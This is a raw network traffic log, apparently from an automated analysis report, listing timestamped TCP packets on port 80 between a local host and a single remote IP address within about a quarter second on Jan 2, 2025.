                                                          Jan 2, 2025 10:54:57.937093973 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937093973 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937107086 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937108040 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937117100 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937129021 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937135935 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937140942 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937151909 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937164068 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937166929 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937180042 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937186003 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937222958 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.941891909 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046011925 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046049118 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046060085 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046071053 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046082020 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046092033 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046093941 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046109915 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046139956 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046181917 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046194077 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046205044 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046216011 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046226978 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046238899 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046247959 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046273947 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046365023 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046462059 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046473026 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046483994 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046494961 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046497107 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046508074 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046519995 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046540976 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046731949 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046751022 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046761036 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046772957 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046787977 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046791077 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046801090 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046813011 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046813965 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046824932 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046840906 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046843052 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046854973 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046866894 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046869993 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046880007 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046886921 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046914101 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047208071 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047219038 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047229052 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047240019 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047251940 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047261953 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047274113 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047274113 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047307968 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047494888 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047506094 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047518015 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047528982 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047538042 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047552109 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047641039 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047652960 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047663927 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047674894 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047683954 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047693014 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047703981 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047705889 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047739029 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047755957 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047769070 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047780037 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047791004 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047800064 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047804117 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047808886 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047816992 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047828913 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047841072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047854900 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047877073 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047898054 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.048320055 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048331976 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048345089 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048356056 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048367023 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048372984 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.048378944 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048394918 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048407078 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048419952 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.048419952 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.048453093 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.048628092 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048639059 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048649073 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048660040 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048670053 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048676014 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.048681974 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048696041 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048705101 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.048708916 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048724890 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.048769951 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.048943996 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048960924 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048979044 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048998117 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049001932 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049010992 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049022913 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049034119 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049036026 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049056053 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049061060 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049071074 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049082994 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049093962 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049096107 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049123049 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049545050 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049556971 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049568892 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049582005 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049593925 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049606085 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049608946 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049618959 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049632072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049647093 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049652100 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049659967 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049673080 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049674034 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049685001 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049686909 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049711943 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049910069 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049922943 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049935102 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049947023 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049954891 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049967051 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049973011 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.049981117 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.049993992 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050005913 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050018072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050024986 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.050031900 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050045013 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050054073 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.050057888 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050067902 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.050071955 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050081015 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.050085068 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050097942 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050110102 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050111055 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.050124884 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050137997 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.050138950 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.050170898 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.052476883 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.138221025 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138238907 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138264894 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138278961 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138290882 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138303995 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138325930 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.138354063 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138369083 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138376951 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.138406992 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138413906 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.138459921 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138473034 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138501883 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.138566017 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138586998 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138600111 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138612032 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138613939 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.138624907 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138638020 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138639927 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.138669014 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.138732910 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138746023 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138788939 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.138845921 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138859034 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138878107 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138890028 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138894081 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.138902903 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.138917923 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.138943911 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139019966 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139039993 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139074087 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139166117 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139185905 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139198065 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139209986 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139223099 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139230967 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139235020 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139247894 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139250040 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139266014 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139273882 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139277935 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139291048 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139302015 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139307976 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139318943 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139353037 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139389038 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139544010 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139555931 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139566898 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139585018 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139672041 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139683962 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139693975 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139713049 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139734030 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139887094 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139899015 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139910936 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139920950 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139931917 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139941931 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139955044 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139964104 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139967918 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139981031 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.139986038 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.139992952 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140005112 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.140010118 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140038013 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.140217066 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140228987 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140240908 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140260935 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.140280962 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.140429974 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140456915 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140466928 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140477896 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140489101 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140495062 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.140501976 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140513897 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140516043 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.140525103 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140536070 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140539885 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.140548944 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140561104 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.140563011 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140574932 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140585899 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140594006 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.140598059 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140610933 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140613079 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.140623093 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140634060 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.140639067 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.140657902 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141006947 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141058922 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141058922 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141072035 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141107082 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141195059 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141206026 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141217947 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141227007 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141237974 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141243935 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141249895 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141259909 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141289949 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141442060 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141452074 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141463041 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141473055 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141485929 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141495943 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141496897 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141506910 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141509056 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141520977 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141531944 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141540051 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141544104 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141552925 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141555071 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141566992 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141577959 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141580105 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141608000 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.141973972 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141984940 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.141995907 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.142005920 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.142015934 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.142019987 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.142026901 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.142039061 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.142045975 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.142052889 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.142064095 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.142071009 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.142075062 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.142083883 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.142086983 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.142096996 CET4970480192.168.2.5139.99.188.124
